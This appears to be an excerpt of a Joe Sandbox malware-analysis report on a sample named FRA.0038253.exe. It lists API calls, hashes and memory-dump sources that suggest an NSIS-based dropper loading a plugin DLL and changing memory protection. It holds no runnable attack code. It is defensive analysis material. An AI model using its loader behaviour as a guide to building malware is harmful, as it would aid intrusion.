                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                          • Instruction ID: b18ad94488713221ffc593fcfc53d42a6192d645bcccde5b7ab1a12412bbd52f
                                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                          • Instruction Fuzzy Hash: CDE0E672110209BEEF195F50DC0AD7B771DEB18314F01452EF947D4091E6B5E9305634
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403357,00000000,00000000,004031B4,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                                          • Instruction ID: bdd3cbd1d153ae02f25dac326e76355912a713e21b692c984e9b86253f54df5f
                                                                          • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                                          • Instruction Fuzzy Hash: E9E0463220025AAFCF209FA1DC00AAB3B6CEB01260F000433FD58E2040D231E920CAE8
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000008,?,00403325,00000000,004138D8,00000008,004138D8,00000008,000000FF,00000004,00000000), ref: 00405EA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                          • Instruction ID: fa2f0fbde9cfb659f44386b06c696d6bc658fd4b6b530f96672892f56a02ba52
                                                                          • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                          • Instruction Fuzzy Hash: ACE08C3220121AABEF219F50DC00AEB3B6CEB00361F004836FA54E3150D230EA218BE8
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(7075504C,00000004,00000040,7075503C), ref: 707529CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 01345db0ac1814048da7f73541d8ea2d6b3b3adb37759eeedb36fe566c840c57
                                                                          • Instruction ID: 84b47f4483ebc6895d7fa0489dffa2705bff56cf6ea229881819197561b7be62
                                                                          • Opcode Fuzzy Hash: 01345db0ac1814048da7f73541d8ea2d6b3b3adb37759eeedb36fe566c840c57
                                                                          • Instruction Fuzzy Hash: D9F0C0B2900342DEC360CF3A8D647893FF0B715354BF1456AF54CD62E1E37450448B99
                                                                          APIs
                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileString
                                                                          • String ID:
                                                                          • API String ID: 1096422788-0
                                                                          • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                                          • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                                                          • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                                          • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000000,?), ref: 00406101
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                          • Instruction ID: e87fe2dc5984a8df625fa82ceba6c00b82b46dfa598ef8ab629b7034d9e3c4ec
                                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                          • Instruction Fuzzy Hash: 5AD0123204020DBBEF119F90DD05FAB3B1DAB08310F014436FE06A4091D776D530A714
                                                                          APIs
                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 6b1cf60723aa4e8bff23d7db920c2ef5ad98dfd6efc5b9eac5723742e010641f
                                                                          • Instruction ID: 1dc339858398e17bf6810321644557b22d6981813947759a2d5330f0c2e937d9
                                                                          • Opcode Fuzzy Hash: 6b1cf60723aa4e8bff23d7db920c2ef5ad98dfd6efc5b9eac5723742e010641f
                                                                          • Instruction Fuzzy Hash: 7BD01732708214DFDF60DBA8AF08A9FB3A4EB50328B20413BD211F21D1D6B9C5429B2D
                                                                          APIs
                                                                          • SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 00404355
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 3f2b9804eab68573f146fdcade2b4da8b7421c4c2f1d53b715e4224501dc01bf
                                                                          • Instruction ID: 5e893e71cb28d1ecc651d20b4cbd375632880982d7b55d89439e603ef4ab6202
                                                                          • Opcode Fuzzy Hash: 3f2b9804eab68573f146fdcade2b4da8b7421c4c2f1d53b715e4224501dc01bf
                                                                          • Instruction Fuzzy Hash: 48C09BB17443017BDA209F519E45F07776C9750701F1554397754F54D0C6B5E510D72C
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00403368
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                          • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                                          • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                          • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                                          APIs
                                                                          • SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 01d356091c5cee1d9c7d245476c7fa8486dde432518b8bf3a516dd2ea8b2d9b9
                                                                          • Instruction ID: d048147452dbd0c1860f9462119a6b97fc0e3fbee653e89d9f8fcfd31795eed3
                                                                          • Opcode Fuzzy Hash: 01d356091c5cee1d9c7d245476c7fa8486dde432518b8bf3a516dd2ea8b2d9b9
                                                                          • Instruction Fuzzy Hash: D1B09276381601AADA619B00DE09F457A62E7A8B02F418028B244244B0CAB204A1DB18
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,004040F5), ref: 00404323
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 3449ea68190b592a5798f96a6ea8876c912ca1a27c45f6fa5be79c3d216cc7d8
                                                                          • Instruction ID: 2eb38c10ea06243a6a86091da43815d65464e49ad358049b9a5b8d6cdb695d6a
                                                                          • Opcode Fuzzy Hash: 3449ea68190b592a5798f96a6ea8876c912ca1a27c45f6fa5be79c3d216cc7d8
                                                                          • Instruction Fuzzy Hash: F0A012B11011009BCB014B00EF04805BA61A750300700C038A1411003187310421FB09
                                                                          APIs
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                            • Part of subcall function 004058F0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422128,00426800,00426800,00426800,?,920,00000000), ref: 00405919
                                                                            • Part of subcall function 004058F0: CloseHandle.KERNEL32(?), ref: 00405926
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                                                            • Part of subcall function 004066F4: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406705
                                                                            • Part of subcall function 004066F4: GetExitCodeProcess.KERNEL32(?,?), ref: 00406727
                                                                            • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2972824698-0
                                                                          • Opcode ID: c2a232cfaa7ea22cdfd64dd800ee1d9452b4e1bcb438eb6831dd9ff850e197ad
                                                                          • Instruction ID: db9ede1ab5137ae9ee8fe17b22ac7e1cc92bb5324d9ca2e84c12474690a006a4
                                                                          • Opcode Fuzzy Hash: c2a232cfaa7ea22cdfd64dd800ee1d9452b4e1bcb438eb6831dd9ff850e197ad
                                                                          • Instruction Fuzzy Hash: 0AF05432A051219BCF20ABA55D849EF62E8DB01318B15453FF502F21D2C77C4A429AAE
                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 6df6ed9069f820e2cc3179e75ffe12f3728730b81e3d8cdd4856c58ec50d956f
                                                                          • Instruction ID: ea83160534d3c72e14e6becd9d4bd1827c1d0c67ada78eb109745cf75ed44a8b
                                                                          • Opcode Fuzzy Hash: 6df6ed9069f820e2cc3179e75ffe12f3728730b81e3d8cdd4856c58ec50d956f
                                                                          • Instruction Fuzzy Hash: 59D05E73B142009FDB64DBB8BEC445F73A4E7403257304837E402E20D1E57889428618
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004047D8
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404802
                                                                          • SHBrowseForFolderA.SHELL32(?,0041FCF8,?), ref: 004048B3
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004048BE
                                                                          • lstrcmpiA.KERNEL32(Call,spidsmus: Installing), ref: 004048F0
                                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048FC
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040490E
                                                                            • Part of subcall function 00405951: GetDlgItemTextA.USER32(?,?,00000400,00404945), ref: 00405964
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065A9
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065B6
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065BB
                                                                            • Part of subcall function 00406551: CharPrevA.USER32(0000000C,0000000C,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065CB
                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F8F0,?,?,0000040F,?,0041F8F0,0041F8F0,?,00000001,0041F8F0,?,?,000003FB,?), ref: 004049CC
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049E7
                                                                            • Part of subcall function 00404B40: lstrlenA.KERNEL32(spidsmus: Installing,spidsmus: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A5B,000000DF,00000000,00000400,?), ref: 00404BDE
                                                                            • Part of subcall function 00404B40: wsprintfA.USER32 ref: 00404BE6
                                                                            • Part of subcall function 00404B40: SetDlgItemTextA.USER32(?,spidsmus: Installing), ref: 00404BF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$Call$\7w$spidsmus: Installing
                                                                          • API String ID: 2624150263-2670337425
                                                                          • Opcode ID: a70579a3d7acda06ba10cc20817b52a319b8fb6100fd3c7b572cde85c5f37867
                                                                          • Instruction ID: 3761125bbef1c3228a87373e5864fd706f39901ada387834bd2bc6b797aaef4e
                                                                          • Opcode Fuzzy Hash: a70579a3d7acda06ba10cc20817b52a319b8fb6100fd3c7b572cde85c5f37867
                                                                          • Instruction Fuzzy Hash: BFA170F1A00219ABDB11AFA5CC45AAF76B8EF84314F14843BF611B62D1D77C8A418F6D
                                                                          APIs
                                                                            • Part of subcall function 707512A5: GlobalAlloc.KERNEL32(00000040,707512C3,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512AD
                                                                          • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 70751C54
                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 70751C9C
                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 70751CA6
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751CB9
                                                                          • GlobalFree.KERNEL32(?), ref: 70751D99
                                                                          • GlobalFree.KERNEL32(?), ref: 70751D9E
                                                                          • GlobalFree.KERNEL32(?), ref: 70751DA3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751F8A
                                                                          • lstrcpyA.KERNEL32(?,?), ref: 70752128
                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 707521A4
                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 707521B5
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 7075220E
                                                                          • lstrlenA.KERNEL32(00000408), ref: 70752228
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                          • String ID:
                                                                          • API String ID: 245916457-0
                                                                          • Opcode ID: e7a538326da7bf164c407b97501501b610a04e29fc5f191dc2ae909b9aeb6650
                                                                          • Instruction ID: 78762d530564ebc7bcde77772ce318d9ace6e60be0e8cdf3e64ec5e724bbc52c
                                                                          • Opcode Fuzzy Hash: e7a538326da7bf164c407b97501501b610a04e29fc5f191dc2ae909b9aeb6650
                                                                          • Instruction Fuzzy Hash: 5D229E71E0460ADEDB12CFA4C9857EEBBF5BB05306F20852ED196E3280D774598ACB50
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek, xrefs: 0040225D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek
                                                                          • API String ID: 123533781-2569430447
                                                                          • Opcode ID: 7e4bcfcb923b49e39238d4f2abe520509187d47aa8ab1ec228f7b2c395526c7a
                                                                          • Instruction ID: acdf6e72f6b947bb0a5284ae4ba0deec300858df55e4778d54948ee42eae8bd0
                                                                          • Opcode Fuzzy Hash: 7e4bcfcb923b49e39238d4f2abe520509187d47aa8ab1ec228f7b2c395526c7a
                                                                          • Instruction Fuzzy Hash: E2511B71A00218AFDF00EFA4CA88A9D7BB5FF48314F2045BAF515FB2D1DA799981CB54
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: b27f7557ea335839b4c48d632a2dbdad774065ecb69396978edf4fedf326f071
                                                                          • Instruction ID: 5ed852e6a610c10883a0fdcbaa2a1eabfa39daaf502c0fc8fb26de8a8de58f20
                                                                          • Opcode Fuzzy Hash: b27f7557ea335839b4c48d632a2dbdad774065ecb69396978edf4fedf326f071
                                                                          • Instruction Fuzzy Hash: 70F0A771644110DFDB50EBA49E49AEE77689F61314F6000BBE141B20C1C6B84946972E
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404D13
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404D20
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D6F
                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D86
                                                                          • SetWindowLongA.USER32(?,000000FC,0040530F), ref: 00404DA0
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DB2
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DC6
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404DDC
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DE8
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DF8
                                                                          • DeleteObject.GDI32(00000110), ref: 00404DFD
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E28
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E34
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404ECE
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EFE
                                                                            • Part of subcall function 0040432C: SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F12
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F40
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F4E
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404F5E
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405059
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050BE
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050D3
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050F7
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00405117
                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0040512C
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040513C
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051B5
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 0040525E
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040526D
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405298
                                                                          • ShowWindow.USER32(?,00000000), ref: 004052E6
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004052F1
                                                                          • ShowWindow.USER32(00000000), ref: 004052F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N$\7w
                                                                          • API String ID: 2564846305-1400300550
                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044ED
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404501
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040451F
                                                                          • GetSysColor.USER32(?), ref: 00404530
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040453F
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040454E
                                                                          • lstrlenA.KERNEL32(?), ref: 00404551
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404560
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404575
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004045D7
                                                                          • SendMessageA.USER32(00000000), ref: 004045DA
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404605
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404645
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404654
                                                                          • SetCursor.USER32(00000000), ref: 0040465D
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404673
                                                                          • SetCursor.USER32(00000000), ref: 00404676
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046A2
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                          • String ID: -D@$Call$N$\7w
                                                                          • API String ID: 3103080414-1251897827
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
